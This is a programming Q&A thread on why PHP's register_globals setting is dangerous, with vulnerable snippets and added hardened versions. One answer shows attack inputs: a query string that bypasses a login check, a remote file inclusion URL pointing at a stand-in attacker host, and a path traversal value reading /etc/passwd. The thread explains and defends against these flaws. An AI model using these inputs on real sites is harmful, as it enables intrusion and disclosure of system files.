Why is REGISTER_GLOBALS so bad?

Time: 2022-08-08 13:57:56

I'm not a PHP developer but I've seen in a couple of places that people seem to treat it like the plague or something. Why?

4 solutions

#1


13  

REGISTER_GLOBALS means that all variables passed through GET or POST are available as global variables in your script. Since accessing undeclared variables is not an error in PHP (it's a warning), it can lead to very nasty situations. Consider this, for example:

<?php
// $debug = true;
if ($debug) {
    echo "query: $query\n";
}

It is not a bad thing per se (well-engineered code should not generate warnings, therefore should not access any variables that might be undeclared (and should not need REGISTER_GLOBALS for the same reason)), but PHP code is usually [very] low quality, leading to this kind of security hole.
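
The debug snippet above beside a hardened form, as an added example that is not part of the original answer. `extract()` stands in for register_globals (the directive was removed in PHP 5.4.0); the function names, the `$config` array and the sample query are assumptions.

```php
<?php
declare(strict_types=1);

// Stand-in for register_globals = On: extract() copies every request
// parameter into local scope before the page logic runs.
function legacy_page(array $request): string
{
    extract($request);
    // $debug = true;              // left commented out, as in the answer
    $query = 'SELECT 1';           // constructed internal query
    $out = '';
    if ($debug) {                  // only defined when the request supplied it
        $out .= "query: $query\n";
    }
    return $out;
}

// Hardened form: every variable is initialised before use, the flag comes
// from server-side configuration only, and request data is never extracted.
function hardened_page(array $request, array $config): string
{
    $debug = ($config['debug'] ?? false) === true;
    $query = 'SELECT 1';
    return $debug ? "query: $query\n" : '';
}

// Constructed request, equivalent to ?debug=1 on the URL.
$request = ['debug' => '1'];

echo 'legacy leaks query:   ', var_export(legacy_page($request) !== '', true), "\n";
echo 'hardened leaks query: ',
    var_export(hardened_page($request, ['debug' => false]) !== '', true), "\n";
```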

#2


9  

Enabling REGISTER_GLOBALS exposes webpages served by PHP to vulnerabilities which some bad guys will be keen to exploit.

With it enabled, any query string at the end of the URL:

http://yourdomain/something.php?valid=true 

will affect the value of a variable $valid (for example) in something.php, if it exists.

If you're using publicly available PHP code (a library for example) the names of variables are well known, and it would be possible for hackers to control their values by assigning values in the query string. They may be able to bypass authentication.

Even if you're not using public code, it may be possible to guess the names of important variables, and control their values.

It used to be the default to have REGISTER_GLOBALS enabled in PHP.INI.

Recent practice has been to disable it by default. Enable it at your own risk!

#3


3  

Just to add, here are some situations where having REGISTER_GLOBALS enabled could ruin your day:

Using the query string to bypass access control (hack using http://example.com/?logged=1):

<?php
$logged = User::getLogged();
if ($logged)
{
    include '/important/secret.php';
}
?>

Remote File Inclusion (RFI):

<?php
    //http://example.com/?path=http://evilbadthings.example.com/
    include "$path"; 
?>

Local File Inclusion (LFI):

<?php
    //http://example.com/?path=../../../../etc/passwd
    include "$path"; 
?>
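
A hardened replacement for the two `include "$path"` snippets above, as an added example that is not part of the original answer. The request value is only a key into a fixed allow-list; the `PAGES` map, `resolve_page()` and the temporary directory are assumptions made for the demo.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: request keys map to fixed file names, so the
// request never supplies a path, scheme or extension.
const PAGES = ['home' => 'home.php', 'contact' => 'contact.php'];

// Returns the absolute file to include, or null when the request is rejected.
function resolve_page(array $query, string $baseDir): ?string
{
    $key = $query['path'] ?? 'home';          // read explicitly, never a global
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;                          // unknown key, array input, URL, ../
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($base === false || $file === false) {
        return null;                          // missing directory or file
    }
    // Defence in depth: the resolved file must still sit under the base dir
    // (catches a symlinked page file that points elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed demo: a temporary page directory, one legitimate key and the
// two request values quoted in the answer.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'contact.php', "<?php echo 'contact';\n");

$samples = ['contact', 'http://evilbadthings.example.com/', '../../../../etc/passwd'];
foreach ($samples as $value) {
    $file = resolve_page(['path' => $value], $dir);
    echo str_pad($value, 36), ' => ',
        $file === null ? 'rejected' : 'include ' . basename($file), "\n";
}

unlink($dir . DIRECTORY_SEPARATOR . 'contact.php');
rmdir($dir);
```

The `allow_url_include` php.ini directive, which is Off by default, blocks the remote case at the configuration level but does nothing for the local one, so the allow-list is still needed.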

#4


2  

Because it allows the user to inject any global variable in your code without any control.

Based on the quality of the code, it may introduce major security bugs.
